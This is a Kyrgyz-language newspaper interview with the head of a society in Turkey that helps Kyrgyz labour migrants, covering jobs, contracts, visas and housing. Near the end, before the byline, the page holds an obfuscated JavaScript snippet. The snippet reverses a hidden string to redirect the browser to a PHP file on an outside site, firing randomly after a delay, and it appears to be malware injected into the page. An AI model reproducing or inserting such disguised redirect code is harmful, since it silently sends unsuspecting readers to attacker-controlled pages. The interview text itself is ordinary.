Чет жерде жеңишке жеткен жердештер

18-февраль, 2022-ж. / Редакция / Жаңылыктар 58

Учурда кыргыздын улан-кыздары дүйнөнүн чар тарабында эмгектенип жүрүшөт. Алардын айрымдары чет өлкөлүк алдыңкы окуу жайларда окушса, айрымдары өз алдынча ишкердик менен алектенип, белгилүү компанияларда камчы салдырбай иштеп, өзүн да, Кыргызстанды да таанытып жатат. Жаңыдан ачкан «Чет жерде жеңишке жеткен жердештер» аттуу маек-төрүбүздүн алгачкы коногу Түркиядагы «Кыргыздарга жардам көрсөтүү жана билим берүү» коомунун төрайымы Шарапат Токтосадыкова болмокчу. «Эркин Тоо» гезити мындан ары чет жерде окуп, иштеп ийгилик жараткан жердештерибиз тууралуу макала, интервьюларды үзбөй берип турмакчы.

Шарапат айым, сиз жетектеген «Кыргыздарга жардам көрсөтүү жана билим берүү» коому качан түзүлгөн? Коомдун негизги максаты кайсы?

  Бул коом 2019-жылы 30-октябрда түзүлгөн. Негизги максаты-Түркияга келген мекендештерибизге ар тараптан жардам көрсөтүү.

Адатта чет өлкөгө биринчи барган кыргыздар кандай көйгөйлөргө дуушар болушат?

  Сырт жакка биринчи ирет иштегени чыккан кыргыздар тилден кыйналат. Экинчиси, өзүнө ылайык жумуш табыш да кыйынга турат. үчүнчүсү, турак-жай маселеси. Төртүнчүсү, Түркиянын мыйзамдарын жакшы билишпейт. Эгер жумуш табылса, ошол жумуш берген фирма, же кожоюн менен эмгек келишимин түзгөндү эстеринен чыгарышат.

Учурда Түркияда канча кыргыз жарандары эмгектенип жүрөт? Алардын так саны барбы?

 Эгер кыргыздар мурда Орусияга көбүрөөк барышса, акыркы жылдары Түркияга келген эмгек мигранттарынын саны арбыды. Буга бир чети боордош түрк эли менен биздин тилибиздин, динибиздин жакындыгы да себеп болду окшойт деп ойлойм. Анын үстүнө түрк эли Орто Азия элдерине, айрыкча кыргыздарга боор толгой карашат. Түрктөрдүн «биздин ата-бабалар Түркияга Кыргызстандан көчүп келишкен» деген сөздөрүн көп угуп калам. Азыр Түркияда 30 миңден ашуун кыргызстандык жарандар эмгектенип жүрүшөт.

Түркияда кандай кызматтарга суроо-талап жогору?

  Мезгилге жараша жумуштар чыгып турат. Жай айларында жаштарыбыз көбүнчө мейманканаларда, же эс алуучу жайларда иштешет. Кыз-келиндер үй жумуштарында, бала, же карыган ата-энелерди карап эмгектенишет.Бирок, акыркы кезде ушул жумуштарды табуу да кыйын болуп баратат. Анткени, сырттан келген эмгек мигранттар көбөйүүдө.

Дегеле чет өлкөгө чыгып иштөөнү каалаган жарандар эмнелерди билип, эмнеге көңүл бурушу абзел? Кайсы бир өлкөгө бара электе, Кыргызстанда жүргөн кезинде эмнелерди алдын-ала билип алыш керек?

  Биринчиден, барып иштей турган мамлекеттин мыйзамдарын окуп, таанышып алыш керек. А бизде, кыргыздарда, кандай? Айылдашы, же классташы, же тайкеси иштеп жүргөн болот. Анан ал «кел» деп чакырат. Билет сатып алат да учуп келе берет. Баарын Кыргызстандай эле болсо керек деп жоромолдойт. Башка мамлекет болгондон кийин ал жердин мыйзамы, тартиби, үрп-адаты, менталитети баары башкача болот. Анан ошол барып иштей турган өлкөнүн тилин үйрөнүп, жок дегенде өзүн тааныштырганды, көчөнүн дарегин сураганды, дүкөнгө кирсе бир нерсени сатып алгыдай деңгээлде билип алганы жакшы.

Сиздердин коомго кыргыз жарандары кандай маселе менен көп кайрылат?

  Көбүнесе жумуш таап берүүнү сурап кайрылышат. Ошондой эле жатакана, квартирадан жардам берүү маселеси менен келишет. Ар кандай зордук- зомбулукка кабылган жарандар да көп кайрылышат. Биз, бардыгына колдон келген жардамыбызды көрсөтөбүз.

 Шарапат айым, өзүңүз жогоруда белгилегендей, чет жерде жумуш табуу да бир топ кыйын. Биздин жарандар жумуш тапкандан кийин алданып калбаш үчүн кандай келишимдерди түзүш керек?

 Тилекке каршы, биздин көпчүлүк жарандар өздөрүнүн укугун жакшы билбейт. Иш берген фирма, же жеке тарап эмне десе баарына макул боло берет. Келишимге кол коет, анын шарттары менен таанышпайт. Кийин нааразы болуп, менин эмгек акымды аз берип койду, же кайсы бир жумуштарым үчүн такыр эле төлөбөй койду деп даттанып келишет. Барып, сүрүштүрүп карасак өзү башында макул болуп, кол коюп берген болуп чыгат. Мындан сырткары ошол өзү иштеп жаткан өлкөнүн укук-ченемдик мыйзамын, эмгек тартибин, маданиятын билиш керек. Түркияда эмгекке жайгаштыруу боюнча көптөгөн агенттиктер иш алып барат. Ошо аркылуу ишке орношсо алданбайт. Алданып калган күндө да алар эмгек акысын алып берет. Анан да Түркиянын аба-ырайына, турмуш шартына көнүүгө туура келет.

Түркиянын эмгек тартиби менен Кыргызстандын эмгек тартибинин ортосунда кандай айырмачылыктар бар? Иш берип жаткан фирмалар адамдын кандай сапаттарына өзгөчө басым жасайт?

 Жогоруда айтканымдай, Түркияда кыргыз жарандары көбүнчө ошол жумуш берген үйдө жатып калып иштешет. Түрк ишкерлери адамдын чынчылдыгына, тазалыгына жана жоопкерчилигине карап ишке алышат.

Өзүңүз алгач кайсы чет өлкөгө бардыңыз? Биринчи барганда кандай кыйынчылыктарга туш болдуңуз?

 Мен чет өлкөгө алгач чыккан бардык мигранттардай эле бир топ кыйынчылыкты баштан кечирдим. Биринчи келгенде эле тилин билбей кыйналасың. Анан ошол жердин аба-ырайына, климатына, шартына, салтына, мыйзамына көнүшүң керек болот. Мен Түркияга алгач келгенде бир кемпирди карап иштедим. үйүн бир аял жумасына бир жолу келип тазалап турат. Дагы бир үй кызматкери келип тамагын жасап берет. Менин милдетим үч маал тамагын берип, убагында ийне сайып туруу. Мен жакшы адамдарга туш болдум. Ошентип жүрсөм, бир күнү ал кемпир каза болуп калды. Мага ошол кемпирдин баласы ыраазылык билдирип, тааныштарынан сураштырып башка жумуш таап берди. Эми мен ооруканада медайым болуп иштей баштадым. Ошол жерден түрк тилин үйрөндүм. Анан Кыргызстандан эки кызымы алып келдим. Азыр экөө тең окуп жатат.Бир күнү бир түрк «мен Кыргызстандан келген адамдарга жардам берип иштейм. Кааласаң мени менен иште», — деп чакырып калды. Мен макул болдум. Бир жылдан кийин ал түрк башка шаарга которулуп кетти. Мен ойлонуп отуруп, азыр өзүм жетектеп жаткан «Кыргыздарга жардам көрсөтүү жана билим берүү» коомун түздүм.

 Коомдун аткара турган негизги иштерине токтоло кетсеңиз.

 Биздин коом Түркияда иштеп, окуп жүргөн кыргыздарга ар тараптан жардам көрсөтөт. Мисалы, визасы аяктап калгандардын мөөнөтүн узартып беребиз. Же бир кыргыз үйүнө, Кыргызстанга кайта турган болуп калса, анын ордуна дагы бир кыргызды жумушка киргизебиз. Ооруп калгандар болсо, ооруканага барып жардам көрсөтөбүз. Кудай жамандыктын бетин ары кылсын, эгер кимдир бирөө кырсыкка учурап, каза болуп калса, ал кишинин сөөгүн Мекенге жөнөткөнгө кол кабыш кылабыз. Кээде айрым кыргыздар жашаар жери жок көчөдө калат, аларды жатаканага жайгаштырабыз. Иши кылса жумуш толтура.

Анталияда жашаган кыргыздар майрамдарда жолугуп, иш-чараларды өткөрүп турасыздарбы?

 Ооба. Майрамдарда айымдар арасында волейбол, мырзалар арасында футбол оюндары боюнча мелдештер өтүп турат. Анталиядагы кыз-келиндердин башын бириктирип, жамааттарды түзгөмүн. Бир группада, же жамаатта 256 айым бар. Менде андай жамааттан бешөө бар.Андан сырткары Түркиянын чоң-чоң шаарларына, маданий жайларына, музейлерине атайын саякаттарды уюштуруп турабыз.

Кандай көйгөйлөр бар?

 Түркиядагы кыргыздардын биринчи көйгөйү-жумушка орношуу, виза маселеси. Тилекке каршы мигранттар үчүн иш аз. Кыргызстандан келгендер мамлекеттик кызматтарда иштей албайт. Көбүнчө бала, же кары-картаң адамдарды багып иштешет. үй жумуштарын жасашат.

Чет жерде өз жолун таап, ийгиликке жеткен жердештерибиз да болсо керек?

  Албетте, бар. Айрым азаматтарыбыз, айымдар чакан фирмаларды, кафелерди, дүкөндөрдү, чач тарачканаларды ачып иштетип жатат.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/18_02-1.pdf»>2022-ЖЫЛДЫН 18-ФЕВРАЛЫ

Өмүрбек ТИЛЛЕБАЕВ

18-февраль, 2022-ж. / Редакция / Жаңылыктар 58
Бөлүшүү: Telegram WhatsApp X